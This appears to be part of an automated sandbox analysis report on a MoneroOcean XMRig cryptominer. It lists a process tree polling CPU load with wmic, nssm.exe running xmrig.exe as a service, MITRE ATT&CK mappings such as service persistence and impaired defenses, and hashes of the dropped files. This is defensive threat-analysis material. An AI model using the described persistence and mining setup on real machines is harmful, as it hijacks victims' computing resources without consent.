- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4832
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1956
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4612
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4156
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2208
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2308
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2356
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3644
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3256
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2300
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1684
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5056
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3856
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2220
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2476
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2724
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3228
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3688
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1544
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3768
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4888
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:96
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2940
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3404
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2904
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3160
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3868
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2232
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3356
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1460
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4420
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3612
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2728
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3112
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3272
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:356
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4596
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1852
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2896
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3560
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3004
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4800
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2956
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3736
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4120
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4544
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4512
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5020
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1072
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4244
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4016
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4048

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:2784
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2372

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7ead32605fef2f1826b4e6f85f8692f9

SHA1
5652db49e26f5bc78919c2bd43b8f7b20e0ae0e8

SHA256
ab29a16ad5692d5df06659dfb30ae756ec16f4af1c9c3c6fc7e67979a87fd43c

SHA512
52054fed9749ec16b9d3d771cd33c376ca6a506e9bab3d420866b724cbf452202e9484d09bcc6beee704cc69a4e5a66de1b31b2003f7505c0a9d7b6e50c86be4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
31865007631d4a5a4e8581818100afdc

SHA1
7c89055b8972488ad6d26e03d695eb022a3000b0

SHA256
b26ec0f1eadd92bc8f85e2b995099addd75d6da0218fd342862658abba00079f

SHA512
c6a71368043f960e3ddf229c090a25231c50fde2c45fc425f953d5c9153747f1767a0283d6d4ea8dd29f2570d2de25985229b272a7b50160475d37ebb8e1435b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5992a73159b7b56f001ea6a3ac5ae051

SHA1
f5d03e4061288301f4d4697a076409ced31ba09d

SHA256
eb8e523c0368ffd18eff8a40f09d4854a96c292e64615c3a554dda43ba4385be

SHA512
f602c98c2cbe5bf3281de41661c4064b24f14f6b4002b7f76d667404a3f25882c04908e5122f503b08ad13770d8a124840e09177628d4d43fb91a645d0dc1287

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
66e25c85bef7550ef6e08d936e55167c

SHA1
623d0feabec6d208c293c99cf279e22fb953adcb

SHA256
907313870dd126f0ad84f0dbbc290b0303863ae62c4943e97822f6b77556d322

SHA512
eb5e6fa4b22be94ec5a9339adaeebbf470419351f5b894f430bde19ae01aac969b6174ac414e6046487096462b461938bee5c5ce31c3d58c02177c2d55192139

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7d5e18209d5ca62632d74076b3f97d25

SHA1
de0acdc9ca8af5858f87893ad6c3c3a169a69bb1

SHA256
d5be16384996829c09b92567b9166ae34375d1980906130a07bae3f31e073eb4

SHA512
36fac3cd5b3a4860b8bb303e38e0140b29fe773bbb39ce6941ba31f1805ad1cf1a955d96633fe0affae363f42bb9ee9deccd7977e7efb29592f5f018bd93100a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e92d146f98dc6ce234188979b0d613f0

SHA1
990417497545a7217334d5e037a1612d618162a3

SHA256
f7082f6549922eb1eb32fb75da68bab32e1aa633c31dbecb9d37262fcc9c0fce

SHA512
e6134382f142edf346cbc212ee04d7026e9017725d87f0bb2fa8b81bdfcefbd5f18d81d5f15175e9630a146c29fe867d5fc804f26aba35c91f2bc07da009e3d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f420b996dd1d4528ead08e3c07ebbf23

SHA1
ef67e2aa669f7002dfe6fde6a0b45323e98e88c8

SHA256
27913988be2b7d9ebfb506f74da82be4d8ef0e34de931754623e6878a1ddef83

SHA512
48cfdc4ec08ec4401c8f82773762c4b17d2a40ede8fb3e116e832291b33d91437fadfa79b15f8fcec67ebebfa7a9f5005429ff24858fcb6b9ce4fd01abb7e0f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0692c6886e305304cb0facba980f00d4

SHA1
f748c7c798c53a1c625e032e5b4c4d62172c440f

SHA256
03f7bd417d6dac8481151582013cfb11ba6a300c7f402e258dae59051225b755

SHA512
f8cdfae656a5fe949b701010caf7a1727086de76df1e061b51256850b00a3a9f3294f7d28d4c27d93cdf2f94e99bfa76a02625324a32eade60b0d0664e47139a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6c5a62eb0a1847365da98b3228af2bb3

SHA1
931db63d99f20db242c5cb65fe5fd6f3f44daa9c

SHA256
0f8d5035e08da5a95e4b48cd1db1e6e459878e8853b5e4a45f5767f66ed2838e

SHA512
ce801f0de481e2ab9cea2a38791babc5d56e9dbcdd300a68459ad2226bfb583e001eae1cfa9175a1b605f589731f9a90e0057a84efbae8698871e825fc2faa22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f93b1225ec021fed1579385bcc08c7cf

SHA1
32856b2dc54a70885b74523b4b9ed349ea254c62

SHA256
57a907e1e6b1a48c9728f854019b5096c9c4576a2376608dbb78eb43362e5fc0

SHA512
4abc2f637ded7f3c4c7d2b0a4e556d3d759ef00c3ead8802476b10ff07f9247782428e9e99d00b04f941d17666bed6dc9d51353141a152fa0d117a513ff0c9ea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
240B

MD5
e3e3d008da132770db04dcda5cc15e46

SHA1
b89b8502aa64138d376985e2ad6595f37c8dfff0

SHA256
4f686be10b9d985f507544d40f4ccb7ba42efd0a3fe56a7f670e4a80d30a56b3

SHA512
33f38bd84959d49d1312df6115b13156dc36e3fae11d821cdd9fc63b889af878586b78c17da72a981bd17a8227eeefbeaba57455c560738cb8cff6b6b65097d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9109641c1e3251f1e71055db144fe6ae

SHA1
ed570f621265813b741cb3691e4e19b15ec930ed

SHA256
a7e507385b626de88426d03e341f73dbc7d52ab3053d20af73e223d0850ec68c

SHA512
f385eaff71e3ce761b16402085a884706dd52a3ebc5fc5d40dc122b7a17290ea2f68a6518d4c08dcc34f9be90927dda75ce4f95928a807d83ecaf67fa9034a5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_inkjpaon.3iz.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpD830.tmp.bat

Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
67099c11aee7715195c370daf8713cf6

SHA1
4ffe1365749d5828225c3c91efbf37524f6b4574

SHA256
91a469ac7711ea2098eeed42b648548c51a109b83fd54fac53b643a4d9f127c8

SHA512
4a4351749e0a6dfb211196af3eb892486c3df501ec6923cad96c16605e40cca3febaf908ece586e36a55b2945141140c18c0359badd0d609999aed747221145b

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
e3b9b22db047eeacf220bc3b9c7f4eb2

SHA1
3b32a79bfde5b7860537e969a65c9ce854794efb

SHA256
5ef97aec367578d4ef6954f09f3ad4db6bb92d74dd08db7452c9e7bda32327d4

SHA512
0f9f534bcf09077b826fee22bfcdb24cdef734ab10f903687107b28b28c2e45cfa72655ae5716561a4b2aade574595a373f27df380792aa7bec3281056ab7d27

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
a95317d05f94f08d17bd77cda0988c08

SHA1
90eee1a7ac3be0828fba575b1c9632efc4842564

SHA256
ebe2ea08e88891c1195ac7d3a425582ed3bce8d5c3f20bfda043352cf3626a00

SHA512
958795d47d5351b82406b8d4444b483025aa2b8e4a9505e1aa49b7674f1fb0c10fde40325d1cf706f3c3303368777b1a7d9af919893416bb367f7a8d3286afbf

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
12d25779840bba866f4d71347a07eab7

SHA1
ac6c036155c882c695d1cdcb2b654de79b9e7bfa

SHA256
5c75ad14dc7bb90d38fc1812a02da90332708612e95681ba2cd0effc740f062f

SHA512
5973a1b1bbafb7bdcae7ac93610c63ae34f48aa42bf174441171041d25e23db60b80fba1f79faedafca27f11037e07881975c3f8ace2a3091c06cab8b9ca6dfc

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
88508a886b6fa68d53ea89c3f39d40cc

SHA1
1e85cf0db0b30289bb737843665d459013396029

SHA256
f468ef658728172768c1253db8d93eafc21bfd72d8bbdf3676e9f40e8e4f99b5

SHA512
deae44719d1d59709d99408d625aaaf9858aedb18d553b080531a3c2d728b59629c2fbed7b7dbb252e427918264905855858b1020ef588a85f359ae0aa759761

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/688-3-0x00007FFF49BA3000-0x00007FFF49BA4000-memory.dmp

Filesize
4KB

Download
memory/688-425-0x00007FFF49BA0000-0x00007FFF4A58C000-memory.dmp

Filesize
9.9MB

Download
memory/688-9-0x000001E86D090000-0x000001E86D106000-memory.dmp

Filesize
472KB

Download
memory/688-10-0x00007FFF49BA0000-0x00007FFF4A58C000-memory.dmp

Filesize
9.9MB

Download
memory/688-26-0x00007FFF49BA0000-0x00007FFF4A58C000-memory.dmp

Filesize
9.9MB

Download
memory/688-6-0x00007FFF49BA0000-0x00007FFF4A58C000-memory.dmp

Filesize
9.9MB

Download
memory/688-5-0x000001E86CEE0000-0x000001E86CF02000-memory.dmp

Filesize
136KB

Download
memory/688-51-0x00007FFF49BA0000-0x00007FFF4A58C000-memory.dmp

Filesize
9.9MB

Download
memory/1468-136-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1468-135-0x00000000001D0000-0x00000000001F0000-memory.dmp

Filesize
128KB

Download
memory/2372-431-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2372-426-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2372-427-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2372-428-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2372-429-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2372-430-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2372-432-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2372-433-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2372-434-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2628-91-0x000001C7D5380000-0x000001C7D538A000-memory.dmp

Filesize
40KB

Download
memory/2628-92-0x000001C7D55D0000-0x000001C7D55E2000-memory.dmp

Filesize
72KB

Download